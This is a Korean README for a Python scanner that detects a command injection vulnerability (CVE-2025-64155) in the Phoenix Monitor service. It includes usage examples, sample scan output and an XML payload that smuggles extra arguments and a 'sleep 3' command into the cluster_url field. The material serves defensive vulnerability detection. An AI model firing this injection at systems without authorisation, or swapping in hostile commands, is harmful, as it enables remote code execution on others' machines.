
CVE-2025-64155-hunter
Phoenix Monitor 서비스에서 명령 삽입 취약점(CVE-2025-64155)을 탐지하는 Python 스캐너입니다.
CVE-2025-64155는 Phoenix Monitor 서비스의 명령 삽입 취약점으로, handleStorageRequest 명령(명령 ID: 1075724911)의 cluster_url 매개변수를 통해 원격 코드 실행이 가능합니다.
이 취약점은 cluster_url 필드의 사용자 제어 입력이 적절한 정화 없이 셸 명령에 전달될 때 발생하며, 셸 메타 문자를 통한 명령 삽입이 가능합니다.
이 스캐너는 Horizon3AI의 익스플로잇 연구를 기반으로 합니다.
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target: 대상 IP 주소 또는 호스트 이름 (필수)-p, --port: Phoenix Monitor 서비스 포트 (기본값: 7900)--timeout: 연결 제한 시간(초) (기본값: 10)-v, --verbose: 상세 출력 활성화--check-only: 서비스 접근 가능 여부만 확인스캐너는 시간 기반 탐지 방법을 사용합니다:
cluster_url 필드에 sleep 3가 포함된 악성 페이로드와 함께 handleStorageRequest 명령 전송이 방법은 안전하고 비파괴적입니다. 유해한 명령을 실행하지 않으며, 탐지 목적으로 무해한 sleep 명령만 실행합니다.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
스캐너는 다음 구조의 바이너리 메시지를 전송합니다:
XML 페이로드는 cluster_url 필드에 명령 삽입을 포함합니다:
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
이 도구는 승인된 보안 테스트 및 연구 목적으로만 사용됩니다. 소유하고 있거나 테스트할 명시적 권한이 있는 시스템에서만 이 도구를 사용하십시오. 컴퓨터 시스템에 대한 무단 접근은 불법입니다.
MIT 라이선스 - 자세한 내용은 LICENSE 파일을 참조하십시오.